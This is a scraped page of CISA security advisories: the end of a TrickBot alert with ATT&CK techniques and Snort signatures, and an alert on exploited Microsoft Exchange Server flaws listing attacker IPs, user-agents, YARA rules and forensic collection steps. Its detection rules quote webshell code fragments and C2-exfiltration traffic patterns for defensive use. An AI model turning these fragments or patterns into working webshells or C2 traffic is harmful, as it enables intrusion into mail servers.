TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified webpage. Command and Control [TA0011] Technique Tactic ID Use Fallback Channels T1008 TrickBot can use secondary command and control (C2) servers for communication after establishing connectivity and relaying victim information to primary C2 servers. Application Layer Protocol: Web Protocols T1071.001 TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files. Ingress Tool Transfer T1105 TrickBot downloads several additional files and saves them to the victim's machine. Data Encoding: Standard Encoding T1132.001 TrickBot can Base64-encode C2 commands. Non-Standard Port T1571 Some TrickBot samples have used HTTP over ports 447 and 8082 for C2. Encrypted Channel: Symmetric Cryptography T1573.001 TrickBot uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic. Exfiltration [TA0010] Technique Tactic ID Use Exfiltration Over C2 Channel T1041 TrickBot can send information about the compromised host to a hardcoded C2 server. Impact [TA0040] Technique Tactic ID Use Resource Hijacking T1496 TrickBot actors can leverage the resources of co-opted systems for cryptomining to validate transactions of cryptocurrency networks and earn virtual currency. Detection Signatures CISA developed the following snort signature for use in detecting network activity associated with TrickBot activity.   alert tcp any [443,447] -> any any (msg:"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'example.com' (Hex)"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:"|0b|example.com"; fast_pattern:only; content:"Global Security"; content:"IT Department"; pcre:"/(?:\x09\x00\xc0\xb9\x3b\x93\x72\xa3\xf6\xd2|\x00\xe2\x08\xff\xfb\x7b\x53\x76\x3d)/"; classtype:bad-unknown; metadata:service ssl,service and-ports;)   alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT_ANCHOR:HTTP URI GET contains '/anchor'"; sid:1; rev:1; flow:established,to_server; content:"/anchor"; http_uri; fast_pattern:only; content:"GET"; nocase; http_method; pcre:"/^\/anchor_?.{3}\/[\w_-]+\.[A-F0-9]+\/?$/U"; classtype:bad-unknown; priority:1; metadata:service http;)   alert tcp any $SSL_PORTS -> any any (msg:"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'C=XX, L=Default City, O=Default Company Ltd'"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:"|31 0b 30 09 06 03 55 04 06 13 02|XX"; nocase; content:"|31 15 30 13 06 03 55 04 07 13 0c|Default City"; nocase; content:"|31 1c 30 1a 06 03 55 04 0a 13 13|Default Company Ltd"; nocase; content:!"|31 0c 30 0a 06 03 55 04 03|"; classtype:bad-unknown; reference:url,www.virustotal.com/gui/file/e9600404ecc42cf86d38deedef94068db39b7a0fd06b3b8fb2d8a3c7002b650e/detection; metadata:service ssl;)   alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP Client Header contains 'boundary=Arasfjasu7'"; sid:1; rev:1; flow:established,to_server; content:"boundary=Arasfjasu7|0d 0a|"; http_header; content:"name=|22|proclist|22|"; http_header; content:!"Referer"; content:!"Accept"; content:"POST"; http_method; classtype:bad-unknown; metadata:service http;)   alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP Client Header contains 'User-Agent|3a 20|WinHTTP loader/1.'"; sid:1; rev:1; flow:established,to_server; content:"User-Agent|3a 20|WinHTTP loader/1."; http_header; fast_pattern:only; content:".png|20|HTTP/1."; pcre:"/^Host\x3a\x20(?:\d{1,3}\.){3}\d{1,3}(?:\x3a\d{2,5})?$/mH"; content:!"Accept"; http_header; content:!"Referer|3a 20|"; http_header; classtype:bad-unknown; metadata:service http;)   alert tcp any $HTTP_PORTS -> any any (msg:"TRICKBOT:HTTP Server Header contains 'Server|3a 20|Cowboy'"; sid:1; rev:1; flow:established,from_server; content:"200"; http_stat_code; content:"Server|3a 20|Cowboy|0d 0a|"; http_header; fast_pattern; content:"content-length|3a 20|3|0d 0a|"; http_header; file_data; content:"/1/"; depth:3; isdataat:!1,relative; classtype:bad-unknown; metadata:service http;)   alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP URI POST contains C2 Exfil"; sid:1; rev:1; flow:established,to_server; content:"Content-Type|3a 20|multipart/form-data|3b 20|boundary=------Boundary"; http_header; fast_pattern; content:"User-Agent|3a 20|"; http_header; distance:0; content:"Content-Length|3a 20|"; http_header; distance:0; content:"POST"; http_method; pcre:"/^\/[a-z]{3}\d{3}\/.+?\.[A-F0-9]{32}\/\d{1,3}\//U"; pcre:"/^Host\x3a\x20(?:\d{1,3}\.){3}\d{1,3}$/mH"; content:!"Referer|3a|"; http_header; classtype:bad-unknown; metadata:service http;)   alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI GET/POST contains '/56evcxv' (Trickbot)"; sid:1; rev:1; flow:established,to_server; content:"/56evcxv"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)   alert icmp any any -> any any (msg:"TRICKBOT_ICMP_ANCHOR:ICMP traffic conatins 'hanc'"; sid:1; rev:1; itype:8; content:"hanc"; offset:4; fast_pattern; classtype:bad-unknown;)   alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains POST with 'host|3a 20|*.onion.link' and 'data=' (Trickbot/Princess Ransomeware)"; sid:1; rev:1; flow:established,to_server; content:"POST"; nocase; http_method; content:"host|3a 20|"; http_header; content:".onion.link"; nocase; http_header; distance:0; within:47; fast_pattern; file_data; content:"data="; distance:0; within:5; classtype:bad-unknown; metadata:service http;)   alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'host|3a 20|tpsci.com' (trickbot)"; sid:1; rev:1; flow:established,to_server; content:"host|3a 20|tpsci.com"; http_header; fast_pattern:only; classtype:bad-unknown; metadata:service http;) MitigationsCISA and FBI recommend that network defenders—in federal, state, local, tribal, territorial governments, and the private sector—consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid negative impacts. Provide social engineering and phishing training to employees. Consider drafting or updating a policy addressing suspicious emails  that specifies users must report all suspicious emails to the security and/or IT departments. Mark external emails with a banner denoting the email is from an external source to assist users in detecting spoofed emails. Implement Group Policy Object and firewall rules. Implement an antivirus program and a formalized patch management process. Implement filters at the email gateway and block suspicious IP addresses at the firewall. Adhere to the principle of least privilege. Implement a Domain-Based Message Authentication, Reporting & Conformance validation system. Segment and segregate networks and functions. Limit unnecessary lateral communications between network hoses, segments, and devices. Consider using application allowlisting technology on all assets to ensure that only authorized software executes, and all unauthorized software is blocked from executing on assets. Ensure that such technology only allows authorized, digitally signed scripts to run on a system. Enforce multi-factor authentication. Enable a firewall on agency workstations configured to deny unsolicited connection requests. Disable unnecessary services on agency workstations and servers. Implement an Intrusion Detection System, if not already used, to detect C2 activity and other potentially malicious network activity Monitor web traffic. Restrict user access to suspicious or risky sites. Maintain situational awareness of the latest threats and implement appropriate access control lists. Disable the use of SMBv1 across the network and require at least SMBv2 to harden systems against network propagation modules used by TrickBot. Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies. See CISA’s Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on addressing potential incidents and applying best practice incident response procedures. For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops. Resources CISA Fact Sheet: TrickBot Malware MS-ISAC White Paper: Security Primer – TrickBot United Kingdom National Cyber Security Centre Advisory: Ryuk Ransomware Targeting Organisations Globally CISA and MS-ISAC Joint Alert AA20-280A: Emotet Malware MITRE ATT&CK for Enterprise References [1] FireEye Blog - A Nasty Trick: From Credential Theft Malware to Business Disruption [2] Eclypsium Blog - TrickBot Now Offers 'TrickBoot': Persist, Brick, Profit Revisions March 17, 2021: Initial Version March 24, 2021: Added MITRE ATT&CK Technique T1592.003 used for reconnaissance May 20, 2021: Added new MITRE ATT&CKs and updated Table 1 This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities
    by CISA on 3 Marzo 2021 at 6:12 pm

    Original release date: March 3, 2021 | Last revised: July 19, 2021SummaryUpdated July 19, 2021: The U.S. Government attributes this activity to malicious cyber actors affiliated with the People's Republic of China (PRC) Ministry of State Security (MSS). Additional information may be found in a statement from the White House. For more information on Chinese malicious cyber activity, refer to us-cert.cisa.gov/China. Note: This Alert was updated April 13, 2021, to provide further guidance.  Cybersecurity and Infrastructure Security Agency (CISA) partners have observed active exploitation of vulnerabilities in Microsoft Exchange Server products. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network. Microsoft released out-of-band patches to address vulnerabilities in Microsoft Exchange Server. The vulnerabilities impact on-premises Microsoft Exchange Servers and are not known to impact Exchange Online or Microsoft 365 (formerly O365) cloud email services. This Alert includes both tactics, techniques and procedures (TTPs) and the indicators of compromise (IOCs) associated with this malicious activity. To secure against this threat, CISA recommends organizations examine their systems for the TTPs and use the IOCs to detect any malicious activity. If an organization discovers exploitation activity, they should assume network identity compromise and follow incident response procedures. If an organization finds no activity, they should apply available patches immediately and implement the mitigations in this Alert. Click here for IOCs in STIX format. Technical Details(Updated April 14, 2021): Microsoft's April 2021 Security Update newly discloses and mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019. Microsoft has released out-of-band security updates to address four vulnerabilities in Exchange Server: CVE-2021-26855 allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information. CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution.   CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server. CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server. To locate a possible compromise of these CVEs, CISA encourages organizations read the Microsoft Advisory. It is possible for an attacker, once authenticated to the Exchange server, to gain access to the Active Directory environment and download the Active Directory Database. (Updated March 12, 2021): Microsoft Security Intelligence has released a tweet on DearCry ransomware being used to exploit compromised on-premises Exchange Servers. Ransomware infections can have negative consequences to an affected organization, including: temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses incurred to restore systems and files, and potential harm to an organization’s reputation. (Updated April 12, 2021): CISA recommends organizations review Malware Analysis Report (MAR) MAR-10330097-1.v1 – DearCry Ransomware for detailed analysis, along with TTPs and IOCs. (Updated March 12, 2021): CISA encourages organizations to review CISA’s Ransomware web page for guidance and resources. Victims of ransomware should report it immediately to CISA at www.us-cert.gov/report, a local FBI Field Office, or Secret Service Field Office. Tactics, Techniques and Procedures (Updated March 10, 2021): Microsoft has released a script that scans Exchange log files for IOCs. CISA strongly encourages organizations to run the Test-ProxyLogon.ps1 script—as soon as possible—to help determine whether their systems are compromised. (Updated March 16, 2021): Note: Microsoft has released the Exchange On-premises Mitigation Tool (EOMT.ps1) that can automate portions of both the detection and patching process. Microsoft stated the following along with the release: "[the tool is intended] to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.” Review the EOMT.ps1 blog post for directions on using the tool. (Updated March 10, 2021): CISA recommends investigating for signs of a compromise from at least January 1, 2021 through present. (Updated April 12, 2021): CISA has identified 10 webshells associated with this activity. This is not an all-inclusive list of webshells that are being leveraged by actors. CISA recommends organizations review the following MARs for detailed analysis of the 10 webshells, along with TTPs and IOCs. These MARs include CISA-developed YARA rules to help network defenders detect associated malware. AR21-072A: MAR-10328877.r1.v1: China Chopper Webshell AR21-072B: MAR-10328923.r1.v1: China Chopper Webshell AR21-072C: MAR-10329107.r1.v1: China Chopper Webshell AR21-072D: MAR-10329297.r1.v1: China Chopper Webshell AR21-072E: MAR-10329298.r1.v1: China Chopper Webshell AR21-072F: MAR-10329301.r1.v1: China Chopper Webshell AR21-072G: MAR-10329494.r1.v1: China Chopper Webshell AR21-084A: MAR-10329496-1.v1: China Chopper Webshell AR21-084B: MAR-10329499-1.v1: China Chopper Webshell AR21-102A: MAR-10331466-1.v1: China Chopper Webshell (Updated March 13, 2021): A webshell is a script that can be uploaded to a compromised Microsoft Exchange Server to enable remote administration of the machine. Webshells are utilized for the following purposes: To harvest and exfiltrate sensitive data and credentials; To upload additional malware for the potential of creating, for example, a watering hole for infection and scanning of further victims; To use as a relay point to issue commands to hosts inside the network without direct internet access; To use as command-and-control infrastructure, potentially in the form of a bot in a botnet or in support of compromises to additional external networks. This could occur if the adversary intends to maintain long-term persistence. (Updated March 13, 2021): For more information, see TA15-314A Compromised Web Servers and Web Shells - Threat Awareness and Guidance. The majority of the TTPs in this section are sourced from a blog post from Volexity, a third-party cybersecurity firm. Note: the United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government. Volexity has observed the following files as targets of HTTP POST requests: /owa/auth/Current/themes/resources/logon.css /owa/auth/Current/themes/resources/owafont_ja.css /owa/auth/Current/themes/resources/lgnbotl.gif /owa/auth/Current/themes/resources/owafont_ko.css /owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot /owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf /owa/auth/Current/themes/resources/lgnbotl.gif Administrators should search the ECP server logs for the following string (or something similar): S:CMD=Set-OabVirtualDirectory.ExternalUrl=' The logs can be found at <exchange install path>\Logging\ECP\Server\. To determine possible webshell activity, administrators should search for aspx files in the following paths: \inetpub\wwwroot\aspnet_client\ (any .aspx file under this folder or sub folders) \<exchange install path>\FrontEnd\HttpProxy\ecp\auth\ (any file besides TimeoutLogoff.aspx) \<exchange install path>\FrontEnd\HttpProxy\owa\auth\ (any file or modified file that is not part of a standard install) \<exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\ (any aspx file in this folder or subfolders) \<exchange install path>\FrontEnd\HttpProxy\owa\auth\<folder with version number>\ (any aspx file in this folder or subfolders) Administrators should search in the /owa/auth/Current directory for the following non-standard web log user-agents. These agents may be useful for incident responders to look at to determine if further investigation is necessary. These should not be taken as definitive IOCs: DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html) facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php) Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm) Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails) Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp) Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots) Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 Volexity observed these user-agents in conjunction with exploitation to /ecp/ URLs: ExchangeServicesClient/0.0.0.0 python-requests/2.19.1 python-requests/2.25.1 These user-agents were also observed having connections to post-exploitation web-shell access: antSword/v2.1 Googlebot/2.1+(+http://www.googlebot.com/bot.html) Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) As with the non-standard user-agents, responders can examine internet information services (IIS) logs from Exchange Servers to identify possible historical activity. Also, as with the non-standard user agents, these should not be taken as definitive IOCs: POST /owa/auth/Current/ POST /ecp/default.flt POST /ecp/main.css POST /ecp/<single char>.js Volexity has seen attackers leverage the following IP addresses. Although these are tied to virtual private servers (VPSs) servers and virtual private networks (VPNs), responders should investigate these IP addresses on their networks and act accordingly: 103.77.192[.]219 104.140.114[.]110 104.250.191[.]110 108.61.246[.]56 149.28.14[.]163 157.230.221[.]198 167.99.168[.]251 185.250.151[.]72 192.81.208[.]169 203.160.69[.]66 211.56.98[.]146 5.254.43[.]18 5.2.69[.]14 80.92.205[.]81 91.192.103[.]43 Volexity has also provided the following YARA signatures that can be run within your network to assist in finding signs of a compromise. rule webshell_aspx_simpleseesharp : Webshell Unclassified {     meta:         author = "threatintel@volexity.com"         date = "2021-03-01"         description = "A simple ASPX Webshell that allows an attacker to write further files to disk."         hash = "893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2"       strings:         $header = "<%@ Page Language=\"C#\" %>"         $body = "<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine"       condition:         $header at 0 and         $body and         filesize < 1KB }   rule webshell_aspx_reGeorgTunnel : Webshell Commodity {     meta:         author = "threatintel@volexity.com"         date = "2021-03-01"         description = "A variation on the reGeorg tunnel webshell"         hash = "406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928"         reference = "https://github.com/sensepost/reGeorg/blob/master/tunnel.aspx"       strings:         $s1 = "System.Net.Sockets"         $s2 = "System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get"         // a bit more experimental         $t1 = ".Split(‘|’)"         $t2 = "Request.Headers.Get"         $t3 = ".Substring("         $t4 = "new Socket("         $t5 = "IPAddress ip;"       condition:         all of ($s*) or         all of ($t*) }   rule webshell_aspx_sportsball : Webshell Unclassified {     meta:         author = "threatintel@volexity.com"         date = "2021-03-01"         description = "The SPORTSBALL webshell allows attackers to upload files or execute commands on the system."         hash = "2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a"       strings:         $uniq1 = "HttpCookie newcook = new HttpCookie(\"fqrspt\", HttpContext.Current.Request.Form"         $uniq2 = "ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE="           $var1 = "Result.InnerText = string.Empty;"         $var2 = "newcook.Expires = DateTime.Now.AddDays("         $var3 = "System.Diagnostics.Process process = new System.Diagnostics.Process();"         $var4 = "process.StandardInput.WriteLine(HttpContext.Current.Request.Form[\""         $var5 = "else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[\""         $var6 = "<input type=\"submit\" value=\"Upload\" />"       condition:         any of ($uniq*) or         all of ($var*) } A list of webshell hashes have also been provided by Microsoft: b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944 Note: this is not an all-inclusive list of indicators of compromise and threat actors have been known to use short-term leased IP addresses that change very frequently. Organizations that do not locate any of the IOCs in this Alert within your network traffic, may nevertheless have been compromised. CISA recommends following the guidance located in the Microsoft Advisory to check your servers for any signs of a compromise.   Conduct Forensic Analysis Should your organization see evidence of compromise, your incident response should begin with conducting forensic analysis to collect artifacts and perform triage. Please see the following list of recommendations on how to conduct forensic analysis using various tools. Although the following free tools are not endorsed by the Federal Government, incident responders commonly use them to perform forensics. While collecting artifacts to perform triage, use processes and tools that minimize the alteration of the data being collected and that minimize impact to the operating system itself. Ideally, during data collection, store the data on removable/external media and, when possible, run the artifact collection tools from the same media. Key artifacts for triage that should be collected: Memory All registry hives All windows event logs All web logs Memory can be collected with a variety of open source tools (e.g., FTK Imager by AccessData, Ram Capture by Belkasoft). Registry and Windows Event logs can be collected with a variety of open source tools as well (e.g., FTK_Imager, Kroll Artifact Parser And Extractor [KAPE]). Web logs can also be collected with a variety of open source tools (e.g., FTK Imager). Windows Artifact Collection Guide Execute the following steps in order. 1) Download the latest FTK Imager from https://accessdata.com/product-download/. Note: Ensure your review of and compliance with the applicable license associated with the product referenced, which can be found in the product’s User Guide. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government. 2) Collect memory from live system using FTK Imager. See Memory Capture with FTK Imager.pdf for instructions. Note: Download and copy “FTK Imager” folder to an external drive. Run FTK Imager.exe from the FTK Imager folder from external drive. Wait until memory collect is complete before proceeding to step 2. 3) Collect important system artifacts using KAPE. See KAPE Collection Procedure. Note: Download KAPE from a separate system; do not download KAPE to the target system. Run KAPE from external drive. 4) Collect disk image using FTK Imager. See Live Image with FTK Imager.pdf for instructions. Note: Run FTK Imager.exe from the “FTK Imager” folder from external drive. Memory Capture with FTK Imager 1) Open FTK Imager. Log into the system with Administrator privileges and launch “FTK Imager.” Note: Ensure your review of and compliance with the applicable license associated with the product referenced. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government. 2) Open “Capture Memory." Select “Capture Memory…” from the File menu. Figure 1: FTK Imager – Capture Memory Command 3) Select Path and Filenames. On the window that appears, use the “Browse” button to identify the destination of the memory capture. Save the memory capture to an external device and not the main hard drive of the system. Doing so will prevent the saved file from overwriting any dataspace on the system. Name the destination file with a descriptive name (i.e., hostname of the system). Select the box “Include pagefile” and provide a name of the pagefile that is descriptive of the system. Do not select “Create AD1 file.” Figure 2: FTK Imager – Memory Capture 4) Capture Memory. Click on “Capture Memory” to begin the capture process. The process will take several minutes depending on the size of the pagefile and the amount of memory on the system. Figure 3: FTK Imager – Capture Process KAPE Collection Procedure [1] 1) Download KAPE from https://www.kroll.com/en/services/cyber-risk/investigate-and-respond/kroll-artifact-parser-extractor-kape. 2) Disable any antivirus or host protection mechanisms that prevent execution from removable media, or data loss prevention (DLP) mechanisms that restrict utilization of removable media. Enable antivirus and host protection once this process is completed. 3) Unzip Kape.zip and run gkape.exe as admin from your removable media 4) Target source should be the drive on which the OS resides, typically C:. 5) Target destination should be an external drive folder, not the same drive as the Target source. If available, use an external hard drive or flash drive. A KAPE execution with these parameters will typically produce output artifacts with a total size of 1-25 GB. If you are going to be running KAPE on different machines and want to save to the same drive, ensure the Target destination folder is unique for each execution of KAPE. 6) Uncheck Flush checkbox (it is checked natively). 7) Check Add %d and Add %m checkboxes. 8) Select ALL checkboxes to ensure KAPE will target all available data that it is capable of targeting. This takes some time; use the down arrow and space bar to move through the list quickly. 9) Check Process VSCs checkbox. 10) Select Zip radio button and add Base name TargetOutput. 11) Ensure Deduplicate checkbox is checked (it is checked natively). At the bottom you should now see a large Current command line, similar to: .\kape.exe --tsource C: --tdest E:\%d%m --tflush --target !BasicCollection,!SANS_Triage,Avast,AviraAVLogs,Bitdefender,ComboFix,ESET,FSecure,HitmanPro,Malwarebytes, McAfee,McAfee_ePO,RogueKiller,SentinelOne,Sophos,SUPERAntiSpyware,Symantec_AV_Logs,TrendMicro,VIPRE, Webroot,WindowsDefender,Ammyy,AsperaConnect,BoxDrive,CiscoJabber,CloudStorage,ConfluenceLogs,Discord, Dropbox, Exchange,ExchangeClientAccess,ExchangeTransport,FileZilla,GoogleDrive,iTunesBackup,JavaWebCache,Kaseya,LogMeIn,Notepad++, OneDrive,OutlookPSTOST,ScreenConnect,Skype,TeamViewerLogs,TeraCopy,VNCLogs, Chrome,ChromeExtensions,Edge,Firefox,InternetExplorer,WebBrowsers,ApacheAccessLog,IISLogFiles,ManageEngineLogs, MSSQLErrorLog,NGINXLogs,PowerShellConsole,KapeTriage,MiniTimelineCollection,RemoteAdmin, VirtualDisks, Gigatribe,TorrentClients,Torrents,$Boot,$J,$LogFile,$MFT,$SDS,$T,Amcache,ApplicationEvents,BCD,CombinedLogs, EncapsulationLogging,EventLogs,EventLogs-RDP,EventTraceLogs, EvidenceOfExecution,FileSystem,GroupPolicy,LinuxOnWindowsProfileFiles,LnkFilesAndJumpLists,LogFiles,MemoryFiles, MOF,OfficeAutosave,OfficeDocumentCache,Prefetch,RDPCache,RDPLogs,RecentFileCache,Recycle, RecycleBin, RecycleBinContent,RecycleBinMetadata,RegistryHives,RegistryHivesSystem,RegistryHivesUser,ScheduledTasks,SDB, SignatureCatalog,SRUM,StartupInfo,Syscache,ThumbCache,USBDevicesLogs,WBEM,WER,WindowsFirewall,  WindowsIndexSearch,WindowsNotifcationsDB,WindowsTimeline,XPRestorePoints --vss --zip TargetOutput –gui In the bottom right corner hit the Execute! Button. Screenshot below shows gkape.exe during execution, you will also see a command window execute. Note: KAPE usually takes less than 20 minutes to complete on a workstation; if it is taking significantly longer there may be an issue. Figure 4: gkape.exe screenshot MitigationsCISA strongly recommends organizations read Microsoft’s advisory and security blog post for more information on how to look for this malicious activity and to apply critical patches as soon as possible. (Updated March 4, 2021): CISA is aware of threat actors using open source tools to search for vulnerable Microsoft Exchange Servers. This particular type of attack is scriptable, allowing attackers to easily exploit vulnerabilities through automated mechanisms. CISA advises all entities to patch as soon as possible to avoid being compromised.   (Updated March 4, 2021): From Microsoft's patch release, the security updates are available for the following operating systems: Exchange Server 2010 (update requires SP 3 or any SP 3 RU – this is a Defense in Depth update) Exchange Server 2013 (update requires CU 23) Exchange Server 2016 (update requires CU 19 or CU 18) Exchange Server 2019 (update requires CU 8 or CU 7) (Updated March 4, 2021): If you are running an older CU then what the patch will accept, you must upgrade to at least the required CU as stated above then apply the patch.  (Updated March 4, 2021): All patches must be applied using administrator privileges.   (Updated March 5, 2021): If patching is not an immediate option, CISA strongly recommends following alternative mitigations found in Microsoft’s blog on Exchange Server Vulnerabilities Mitigations. However, these options should only be used as a temporary solution, not a replacement for patching. Additionally, there are other mitigation options available. CISA recommends limiting or blocking external access to internet-facing Exchange Servers via the following: Restrict untrusted connections to port 443, or set up a VPN to separate the Exchange Server from external access; note that this will not prevent an adversary from exploiting the vulnerability if the attacker is already in your network. Block external access to on-premises Exchange: Restrict external access to OWA URL: /owa/.  Restrict external access to Exchange Admin Center (EAC) aka Exchange Control Panel (ECP) URL: /ecp/. (Updated March 4, 2021): Disconnect vulnerable Exchange servers from the internet until a patch can be applied. CISA would like to thank Microsoft and Volexity for their contributions to this Alert. Resources (Updated April 14, 2021) Microsoft's April 2021 Security Update that mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019. (Updated March 12, 2021) Check my OWA tool for checking if a system has been affected. Disclaimer: this tool does not check against an exhaustive list of compromised domains. It is meant for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information and cannot assure its accuracy or completeness; therefore, entities should not rely solely on this information to justify foregoing CISA’s recommendations for action described on this webpage. Microsoft Advisory: https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/ Microsoft Security Blog - Hafnium targeting Exchange Servers: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ Volexity Blog: https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ Microsoft’s blog on Exchange Server Vulnerabilities Mitigations: https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/ References Eric Zimmerman: KAPE Documentation Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities Supplemental Direction V1 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities Supplemental Direction V2 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities Revisions March 3, 2021: Initial Version March 4, 2020: Updated Mitigations and Technical Details sections March 5, 2021: Updated Mitigations Guidance from Microsoft March 10, 2021: Updated TTP Section March 12, 2021: Updated Resources Section March 12, 2021: Added information on DearCry Ransomware March 13, 2021: Added seven China Chopper Webshell MARs March 14, 2021: Updated information on DearCry Ransomware March 16, 2021: Added information on EOMT tool March 25, 2021: Added two China Chopper Webshell MARs March 25, 2021: Updated MARs to include YARA Rules March 31, 2021: Added links to ED 21-02 and ED 21-02 Supplemental Direction April 12, 2021: Added one China Chopper Webshell MAR and one DearCry Ransomware MAR April 13, 2021: Added links to Microsoft's April 2021 Security Update and ED 21-02 Supplemental Direction V2 April 14, 2021: Added Exchange Server 2013 to list of on-premises Exchange Servers affected by the vulnerabilities dislcosed on April 13, 2021. July 19, 2021: Added attribution note This product is provided subject to this Notification and this Privacy & Use policy.

News (DARKReading, The Hacker News, Threatpost)